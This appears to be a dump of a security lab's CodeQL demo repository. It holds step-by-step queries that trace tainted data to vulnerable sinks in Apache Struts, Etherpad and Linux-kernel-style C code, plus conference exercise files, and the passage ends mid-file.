/CodeQL_Queries/csharp/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-java
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.java.library
5 |
6 | com.semmle.code.java.dbscheme
7 |
8 | java
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/apache-struts-vulnerability-cve-2017-9805/)
2 |
3 | [This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug.
4 |
5 | This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`.
6 |
7 | The query is based on an earlier version of one of our default queries: `UnsafeDeserialization.ql`. When Mo discovered the vulnerability, the standard query did not detect the problem. But Mo realized by studying previous vulnerabilities in Struts that [ContentTypeHandler](http://struts.apache.org/maven/struts2-plugins/struts2-rest-plugin/apidocs/org/apache/struts2/rest/handler/ContentTypeHandler.html) is a source of untrusted input in Struts, so he modified the query to make it a taint source. With that modification, the query found the RCE vulnerability. Our Java team have since improved `UnsafeDeserialization.ql` so that it is able to detect this vulnerability, so this is a great example of how the work of the Semmle Security Team helps to improve our queries for all our users. It is interesting to compare the result of Mo's query with the new default query, which you can find in the directory `Security/CWE/CWE-502/`. The source found by the default query is buried deeper in the library than the one found by Mo's query.
8 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 01_compileAndExecute
3 | */
4 |
5 | import java
6 |
/* Find the method named "compileAndExecute". It evaluates OGNL, so it will
 * be the sink of the data-flow analysis built up in the following steps.
 */
from Method compile
where compile.hasName("compileAndExecute")
select compile
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 02_compileAndExecute
3 | */
4 |
5 | import java
6 |
/* Find calls to "compileAndExecute", paired with the called method. */
from Method compile, MethodAccess call
where
  call.getMethod() = compile and
  compile.hasName("compileAndExecute")
select compile, call
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 03_compileAndExecute
3 | */
4 |
5 | import java
6 |
/* Argument 0 of compileAndExecute is the string that gets evaluated, so that
 * expression is what we actually care about.
 */
from Method compile, MethodAccess call
where
  call.getMethod() = compile and
  compile.hasName("compileAndExecute")
select call.getArgument(0)
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 04_compileAndExecute
3 | */
4 |
5 | import java
6 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
14 |
/* Same results as the previous query; the logic now lives in a predicate. */
from Expr ognlExpr
where isOgnlSink(ognlExpr)
select ognlExpr
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/05_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 05_getNamespace
3 | */
4 |
5 | import java
6 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 * Unused in this step; it is needed again later in the sequence.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
14 |
/* Find every method named "getNamespace". */
from Method getNamespace
where getNamespace.hasName("getNamespace")
select getNamespace
19 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/06_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 06_getNamespace
3 | */
4 |
5 | import java
6 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
13 |
/* Only `ActionProxy.getNamespace` and the methods that (transitively)
 * override it are of interest. `overrides*` includes the base method itself.
 */
from Method base, Method impl
where
  base.hasName("getNamespace") and
  base.getDeclaringType().hasName("ActionProxy") and
  impl.overrides*(base)
select impl
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/07_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 07_getNamespace
3 | */
4 |
5 | import java
6 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
13 |
/* Find calls to `ActionProxy.getNamespace` or to any method overriding it. */
from Method base, Method impl, MethodAccess call
where
  base.hasName("getNamespace") and
  base.getDeclaringType().hasName("ActionProxy") and
  impl.overrides*(base) and
  call.getMethod() = impl
select call
22 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/08_getNamespace.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 08_getNamespace
3 | */
4 |
5 | import java
6 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
13 |
/**
 * Holds if `ma` calls `ActionProxy.getNamespace()` or any method that
 * (transitively) overrides it.
 */
predicate isActionProxySource(MethodAccess ma) {
  exists(Method base |
    base.hasName("getNamespace") and
    base.getDeclaringType().hasName("ActionProxy") and
    ma.getMethod().overrides*(base)
  )
}
22 |
/* Same results as the previous query; the logic now lives in a predicate. */
from MethodAccess namespaceCall
where isActionProxySource(namespaceCall)
select namespaceCall
29 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/09_dataflow.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name 09_dataflow
3 | * @kind path-problem
4 | */
5 |
6 | import java
7 | import semmle.code.java.dataflow.DataFlow
8 | import DataFlow::PathGraph
9 |
/**
 * Holds if `arg` is argument 0 of a call to a method named
 * `compileAndExecute`, i.e. the expression evaluated as OGNL.
 */
predicate isOgnlSink(Expr arg) {
  exists(MethodAccess call |
    call.getMethod().hasName("compileAndExecute") and
    call.getArgument(0) = arg
  )
}
16 |
/**
 * Holds if `ma` calls `ActionProxy.getNamespace()` or any method that
 * (transitively) overrides it.
 */
predicate isActionProxySource(MethodAccess ma) {
  exists(Method base |
    base.hasName("getNamespace") and
    base.getDeclaringType().hasName("ActionProxy") and
    ma.getMethod().overrides*(base)
  )
}
24 |
/**
 * Data-flow configuration from calls of `ActionProxy.getNamespace()` (and
 * its overrides) to the OGNL expression passed to `compileAndExecute`.
 */
class OgnlCfg extends DataFlow::Configuration {
  OgnlCfg() { this = "ognl" }

  override predicate isSource(DataFlow::Node source) {
    exists(MethodAccess call | call = source.asExpr() | isActionProxySource(call))
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(Expr arg | arg = sink.asExpr() | isOgnlSink(arg))
  }
}
36 |
/* First version of the data-flow query, with isActionProxySource as the
 * source and isOgnlSink as the sink. The path-problem select shape lets the
 * result be shown in the path viewer.
 */
from OgnlCfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select source, source, sink, "ognl"
43 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md:
--------------------------------------------------------------------------------
1 | # Apache Struts CVE-2018-11776
2 |
3 | [Blog post](https://securitylab.github.com/research/apache-struts-CVE-2018-11776/)
4 |
5 | [This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
6 |
7 | The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
8 |
9 | # Suggested workflow
10 |
11 | * First run the [final query](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
12 |   * Show the result in the path viewer.
13 | * Show how to build a similar query step by step.
14 |   * We will build a slightly simplified version of the query, so it won't find as many results, but it still finds one of the RCEs.
15 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-java
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-java
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/java/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-javascript
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.javascript.library
5 |
6 | com.semmle.code.javascript.dbscheme
7 |
8 | javascript
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/01_HTTP_handlers.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
/**
 * A function with `req` and `res` parameters, and hence most likely an
 * HTTP route handler.
 *
 * This is a naming heuristic only: it matches any function whose first two
 * parameters are literally named `req` and `res`, regardless of how (or
 * whether) the function is registered as a route, and it misses handlers that
 * use other names such as `request`/`response`. Expect both false positives
 * and false negatives.
 */
class LikelyRouteHandler extends DataFlow::FunctionNode {
  // The two parameters the heuristic keys on; bound in the characteristic predicate.
  DataFlow::ParameterNode req;
  DataFlow::ParameterNode res;

  LikelyRouteHandler() {
    req = getParameter(0) and req.getName() = "req" and
    res = getParameter(1) and res.getName() = "res"
  }
}
16 |
// Find HTTP route handlers via the naming heuristic in LikelyRouteHandler
// (first two parameters literally named `req` and `res`).
from DataFlow::FunctionNode fn
where fn instanceof LikelyRouteHandler
select fn
21 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/02_getASendMethodCall.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
/**
 * A function with `req` and `res` parameters, and hence most likely an
 * HTTP route handler.
 *
 * Naming heuristic only: any function whose first two parameters are literally
 * named `req` and `res` qualifies, however it is registered, and handlers using
 * other parameter names are missed.
 */
class LikelyRouteHandler extends DataFlow::FunctionNode {
  // The two parameters the heuristic keys on; bound in the characteristic predicate.
  DataFlow::ParameterNode req;
  DataFlow::ParameterNode res;

  LikelyRouteHandler() {
    req = getParameter(0) and req.getName() = "req" and
    res = getParameter(1) and res.getName() = "res"
  }

  /**
   * Gets a method of `res` that sends an HTTP response.
   *
   * The base case is `send`; the recursive case follows aliases, so after a
   * property write `res.m = res.send` the name `m` is also a send method.
   * Only property writes on this handler's `res` parameter are considered,
   * so aliases created through other references to the response are missed.
   */
  string getASendMethodName() {
    // res.send
    result = "send"
    or
    // or a method `m` such that there is an assignment `res.m = res.n` where `n`
    // is already known to be a send method
    exists (DataFlow::PropWrite pwn |
      pwn = res.getAPropertyWrite(result) and
      pwn.getRhs() = getASendMethodReference()
    )
  }

  /** Gets a reference to `res.send` or some other known send method (a property read of `res`). */
  DataFlow::PropRead getASendMethodReference() {
    result = res.getAPropertyRead(getASendMethodName())
  }

  /** Gets a call to the send method, i.e. a call whose callee is one of the references above. */
  DataFlow::CallNode getASendMethodCall() {
    result = getASendMethodReference().getACall()
  }
}
39 |
// Find `send` calls (including calls through aliases of `res.send`), which is
// where a handler sends its reply message.
from LikelyRouteHandler handler, DataFlow::CallNode sendCall
where sendCall = handler.getASendMethodCall()
select sendCall
43 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md:
--------------------------------------------------------------------------------
1 | [Blog post](https://securitylab.github.com/research/etherpad-reflected-file-download/)
2 |
3 | [This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability.
4 |
5 | For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-patched-codeql-database/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip).
6 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql:
--------------------------------------------------------------------------------
1 | /**
2 | * @name Reflected cross-site scripting vulnerability
3 | * @kind path-problem
4 | * @problem.severity warning
5 | * @id js/reflected-xss
6 | */
7 |
8 | import javascript
9 | import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss
10 | import DataFlow::PathGraph
11 |
// One path per (source, sink) pair found by the library's ReflectedXss
// configuration; the alert is placed at the sink and links back to the source.
from Configuration config, DataFlow::PathNode src, DataFlow::PathNode snk
where config.hasFlowPath(src, snk)
select snk.getNode(), src, snk, "Cross-site scripting vulnerability due to $@.",
  src.getNode(), "user-provided value"
16 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
/**
 * Gets a data flow node that represents an instance of `swagger-node`.
 *
 * Starts from the `swagger-node-express` module import and closes over:
 *  - local data flow successors of an instance,
 *  - calls to a function that returns an instance, and
 *  - `createNew` method calls on an instance (which yield another instance).
 * Instances obtained by any other route (e.g. passed through a collection or
 * a property) are not recognised.
 */
DataFlow::Node swaggerInstance() {
  result = DataFlow::moduleImport("swagger-node-express")
  or
  result.getAPredecessor() = swaggerInstance()
  or
  result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
  or
  result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
}
13 |
/**
 * An Express route handler installed via `swagger-node`.
 *
 * Matches the function stored in the `action` property of the object literal
 * passed as the first argument to `addGet` on a swagger instance. Only `addGet`
 * registrations are modelled here; handlers registered through other methods
 * (if any) are not covered.
 */
class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
  SwaggerRouteHandler() {
    exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
      addGet.calls(swaggerInstance(), "addGet") and
      resource = addGet.getArgument(0).getALocalSource() and
      this = resource.getAPropertySource("action")
    )
  }

  /** The first parameter is the request and the second the response, as for plain Express handlers. */
  override SimpleParameter getRouteHandlerParameter(string kind) {
    kind = "request" and result = getParameter(0).getParameter()
    or
    kind = "response" and result = getParameter(1).getParameter()
  }

  /** No response headers are modelled for these handlers. */
  override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
}
32 |
// List every function recognised as a swagger-installed route handler.
from DataFlow::FunctionNode fn
where fn instanceof SwaggerRouteHandler
select fn
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
/**
 * Gets a data flow node that represents an instance of `swagger-node`.
 *
 * Starts from the `swagger-node-express` module import and closes over:
 *  - local data flow successors of an instance,
 *  - calls to a function that returns an instance, and
 *  - `createNew` method calls on an instance (which yield another instance).
 * Instances obtained by any other route (e.g. passed through a collection or
 * a property) are not recognised.
 */
DataFlow::Node swaggerInstance() {
  result = DataFlow::moduleImport("swagger-node-express")
  or
  result.getAPredecessor() = swaggerInstance()
  or
  result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
  or
  result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
}
13 |
/**
 * An Express route handler installed via `swagger-node`.
 *
 * Matches the function stored in the `action` property of the object literal
 * passed as the first argument to `addGet` on a swagger instance. Only `addGet`
 * registrations are modelled here. The class is not referenced by the query
 * below; its effect comes from extending `Express::RouteHandler`, which the
 * library's HTTP model presumably picks up.
 */
class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
  SwaggerRouteHandler() {
    exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
      addGet.calls(swaggerInstance(), "addGet") and
      resource = addGet.getArgument(0).getALocalSource() and
      this = resource.getAPropertySource("action")
    )
  }

  /** The first parameter is the request and the second the response, as for plain Express handlers. */
  override SimpleParameter getRouteHandlerParameter(string kind) {
    kind = "request" and result = getParameter(0).getParameter()
    or
    kind = "response" and result = getParameter(1).getParameter()
  }

  /** No response headers are modelled for these handlers. */
  override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
}
32 |
// Every argument the library models as being sent in an HTTP response.
// The SwaggerRouteHandler class above is not named here; it extends the
// library's route-handler model, which is presumably how swagger handlers
// contribute results.
from HTTP::ResponseSendArgument sendArg
select sendArg
35 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql:
--------------------------------------------------------------------------------
1 | import javascript
2 |
/**
 * Gets a data flow node that represents an instance of `swagger-node`.
 *
 * Starts from the `swagger-node-express` module import and closes over:
 *  - local data flow successors of an instance,
 *  - calls to a function that returns an instance, and
 *  - `createNew` method calls on an instance (which yield another instance).
 * Instances obtained by any other route (e.g. passed through a collection or
 * a property) are not recognised.
 */
DataFlow::Node swaggerInstance() {
  result = DataFlow::moduleImport("swagger-node-express")
  or
  result.getAPredecessor() = swaggerInstance()
  or
  result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr()
  or
  result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew")
}
13 |
/**
 * An Express route handler installed via `swagger-node`.
 *
 * Matches the function stored in the `action` property of the object literal
 * passed as the first argument to `addGet` on a swagger instance. Only `addGet`
 * registrations are modelled here; handlers registered through other methods
 * (if any) are not covered.
 */
class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode {
  SwaggerRouteHandler() {
    exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource |
      addGet.calls(swaggerInstance(), "addGet") and
      resource = addGet.getArgument(0).getALocalSource() and
      this = resource.getAPropertySource("action")
    )
  }

  /** The first parameter is the request and the second the response, as for plain Express handlers. */
  override SimpleParameter getRouteHandlerParameter(string kind) {
    kind = "request" and result = getParameter(0).getParameter()
    or
    kind = "response" and result = getParameter(1).getParameter()
  }

  /** No response headers are modelled for these handlers. */
  override HTTP::HeaderDefinition getAResponseHeader(string name) { none() }
}
32 |
// Property accesses `<response>.send` where the qualifier is the response
// expression of a swagger-installed route handler.
from SwaggerRouteHandler handler, PropAccess sendAccess
where sendAccess.accesses(handler.getAResponseExpr(), "send")
select sendAccess
36 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/qlpack.yml:
--------------------------------------------------------------------------------
1 | name: codeql-demos-javascript
2 | version: 0.0.0
3 | libraryPathDependencies: codeql-javascript
4 |
--------------------------------------------------------------------------------
/CodeQL_Queries/javascript/queries.xml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Conferences/2020/H-CON/HC0N.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/H-CON/HC0N.pdf
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/cant-grep-this.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/github/securitylab/105618fc1fa83c08f4446749e64310b539cb0262/Conferences/2020/OffensiveCon/cant-grep-this.pdf
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
/** The kernel allocator `kmalloc`, matched by name. */
class KMalloc extends Function {
  KMalloc() { this.getName() = "kmalloc" }
}
7 |
// Every expression that a kmalloc() result flows to within the same function
// (local data flow, which includes the call itself), together with the
// statement that expression sits in.
from KMalloc alloc, FunctionCall call, Expr use
where
  DataFlow::localExprFlow(call, use) and
  call = alloc.getACallToThisFunction()
select call, use, use.getEnclosingStmt()
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
/** The kernel allocator `kmalloc`, matched by name. */
class KMalloc extends Function {
  KMalloc() { this.getName() = "kmalloc" }
}
7 |
// kmalloc() calls whose result never flows, locally, to the whole condition of
// an `if`: allocations whose failure is not checked. Only a direct flow to the
// controlling expression counts, so `if (!p)` is not recognised by this version.
from KMalloc alloc, FunctionCall call
where
  not exists(IfStmt guard | DataFlow::localExprFlow(call, guard.getControllingExpr())) and
  call = alloc.getACallToThisFunction()
select call
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/dataflow/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.DataFlow
3 |
/**
 * A kmalloc-like kernel allocation function, matched by name.
 * The list is a fixed set of known allocator wrappers; any other wrapper is missed.
 */
class KMalloc extends Function {
  KMalloc() {
    exists(string n | n = this.getName() |
      n = "kmalloc" or
      n = "acpi_os_allocate_zeroed" or
      n = "kzalloc" or
      n = "kcalloc" or
      n = "kmalloc_array" or
      n = "acpi_os_allocate" or
      n = "mempool_kmalloc" or
      n = "alloc_resource" or
      n = "bitmap_alloc" or
      n = "sg_kmalloc" or
      n = "pcpu_mem_zalloc" or
      n = "bitmap_zalloc"
    )
  }
}
20 |
// Allocation calls whose result never reaches any sub-expression of an `if`
// condition in the same function (local data flow), i.e. unchecked allocations.
// Using getAChild*() on the condition also catches forms such as `if (!p)`.
from KMalloc alloc, FunctionCall call
where
  not exists(IfStmt guard |
    DataFlow::localExprFlow(call, guard.getControllingExpr().getAChild*())
  ) and
  call = alloc.getACallToThisFunction()
select call
28 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Functions with "ioctl" somewhere in their name that have a body in this database.
from Function f
where f.hasDefinition() and f.getName().matches("%ioctl%")
select f
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Direct calls to defined "ioctl" functions, paired with the calling function.
from Function f, FunctionCall c
where
  c = f.getACallToThisFunction() and
  f.hasDefinition() and
  f.getName().matches("%ioctl%")
select c.getEnclosingFunction(), c
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/functions/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Places where an "ioctl" function is referenced without being called
// (typically stored in a function pointer, e.g. a file_operations table).
from Function f, FunctionAccess a
where
  a = f.getAnAccess() and
  f.getName().matches("%ioctl%")
select a, f
8 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * A defined function that is neither called nor referenced (e.g. through a
 * function pointer) anywhere in the database.
 */
class UnusedFunction extends Function {
  UnusedFunction() {
    this.hasDefinition() and
    not exists(FunctionCall c | this = c.getTarget()) and
    not exists(FunctionAccess a | this = a.getTarget())
  }
}
10 |
// List every function the database shows no call or reference to.
from UnusedFunction f
select f
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/** A local variable with no access at all (neither read nor written after declaration). */
class UnusedVariable extends LocalVariable {
  UnusedVariable() { not exists(VariableAccess a | this = a.getTarget()) }
}
6 |
// List every local variable that is never accessed.
from UnusedVariable v
select v
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/quantifiers/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * An assignment whose two sides have different underlying types, i.e. one
 * where an implicit conversion happens at the `=`.
 */
class InterestingAssignment extends Assignment {
  InterestingAssignment() {
    exists(Type lhs, Type rhs |
      lhs = this.getLValue().getUnderlyingType() and
      rhs = this.getRValue().getUnderlyingType()
    |
      lhs != rhs
    )
  }
}
8 |
// Each converting assignment with the types of its left- and right-hand sides.
from InterestingAssignment a
select a, a.getLValue().getUnderlyingType(), a.getRValue().getUnderlyingType()
11 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/tainttracking/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
// Expressions reached, via local taint flow, from a `_IOC_SIZE(...)` expansion,
// i.e. places influenced by the size field of a user-supplied ioctl command.
from MacroInvocation mi, Expr sizeExpr, Expr tainted
where
  TaintTracking::localExprTaint(sizeExpr, tainted) and
  sizeExpr = mi.getExpr() and
  mi.getMacroName() = "_IOC_SIZE"
select sizeExpr, tainted
10 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex0.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Calls to a function named `recv`.
from FunctionCall c
where exists(Function f | f = c.getTarget() and f.getName() = "recv")
select c
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex1.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Calls to a function named `amqp_tcp_socket_recv`.
from FunctionCall c
where exists(Function f | f = c.getTarget() and f.getName() = "amqp_tcp_socket_recv")
select c
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex2.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// References (not calls) to `amqp_tcp_socket_recv`, e.g. where it is stored
// into a function-pointer table.
from FunctionAccess a
where exists(Function f | f = a.getTarget() and f.getName() = "amqp_tcp_socket_recv")
select a
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex3.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// The struct type named `amqp_socket_class_t`.
from Struct s
where "amqp_socket_class_t" = s.getName()
select s
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex4.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// The `recv` field of `amqp_socket_class_t` and every access to it
// (calls through that function-pointer field show up as accesses).
from Struct s, Field recvField
where
  recvField.getName() = "recv" and
  recvField = s.getAField() and
  s.getName() = "amqp_socket_class_t"
select s, recvField.getAnAccess()
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex5.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
// Calls to a function named `amqp_socket_recv`.
from FunctionCall c
where exists(Function f | f = c.getTarget() and f.getName() = "amqp_socket_recv")
select c
6 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex6.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
/**
 * An access to the `bytes` field of an `amqp_bytes_t` value, matched by the
 * type name of the qualifier and the field name; treated as data that came
 * off the network.
 */
class NetworkBytes extends FieldAccess {
  NetworkBytes() {
    this.getTarget().getName() = "bytes" and
    this.getQualifier().getType().getName() = "amqp_bytes_t"
  }
}
10 |
// List every `amqp_bytes_t.bytes` access.
from NetworkBytes b
select b
13 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex7.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/** The function `amqp_pool_alloc_bytes`, matched by name. */
class TargetFunction extends Function {
  TargetFunction() { "amqp_pool_alloc_bytes" = this.getName() }
}
6 |
// Every call to amqp_pool_alloc_bytes.
from TargetFunction target, FunctionCall c
where c = target.getACallToThisFunction()
select c
9 |
--------------------------------------------------------------------------------
/Conferences/2020/OffensiveCon/exercises/testcase/ex8.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 | import semmle.code.cpp.dataflow.TaintTracking
3 |
/**
 * An access to the `bytes` field of an `amqp_bytes_t` value, matched by the
 * type name of the qualifier and the field name; treated as data that came
 * off the network.
 */
class NetworkBytes extends FieldAccess {
  NetworkBytes() {
    this.getTarget().getName() = "bytes" and
    this.getQualifier().getType().getName() = "amqp_bytes_t"
  }
}
10 |
/** The function `amqp_pool_alloc_bytes`, matched by name. */
class TargetFunction extends Function {
